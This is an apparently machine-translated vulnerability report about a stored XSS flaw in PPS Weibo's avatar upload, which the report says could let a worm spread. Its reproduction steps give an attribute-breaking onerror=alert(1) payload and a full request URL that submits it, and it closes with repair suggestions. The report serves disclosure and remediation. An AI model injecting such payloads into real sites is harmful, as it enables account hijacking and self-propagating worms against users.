Brief description: stored XSS, which can easily cause worms and infections.
Detailed Description: <product target of the vulnerability>
PPS Weibo
<Hazard>
The stored XSS vulnerability can cause worms to spread and cause serious harm.
<Reproduction method>
Demo address:
Http://y.pps. TV /154193789
Implementation Method: www.2cto.com
User settings-> modify Avatar-> select Avatar-> packet capture change Avatar address: http://s3.ppsimg.com/t_images/face_temp/20111109/pnge6211f49803f9efd2c8f937f6587a609.j "+ src = # + onerror =" alert (1)
Or directly submit the data:
Http://y.pps. TV /upload.php? Type = face & r = 0.5138148728288972 & p = http % 3a % 2f % 2fs3.ppsimg.com % 2ft_images % 2fface_temp % 2f20111109% 2fpnge6211f49803f9efd2c8f937f6587a609. j % 22 + src = % 23 + onerror % 3d % 22 alert (1) & x = 0 & y = 0 & w = 32 & h = 31 & o_page = setting_myface
<Repair suggestion>
1. Enhanced Filtering
2. Change the Avatar data submission method to POST to avoid the temptation of users to modify the avatar through short connections.
Proof of vulnerability:
Solution: see details
Author: ccSec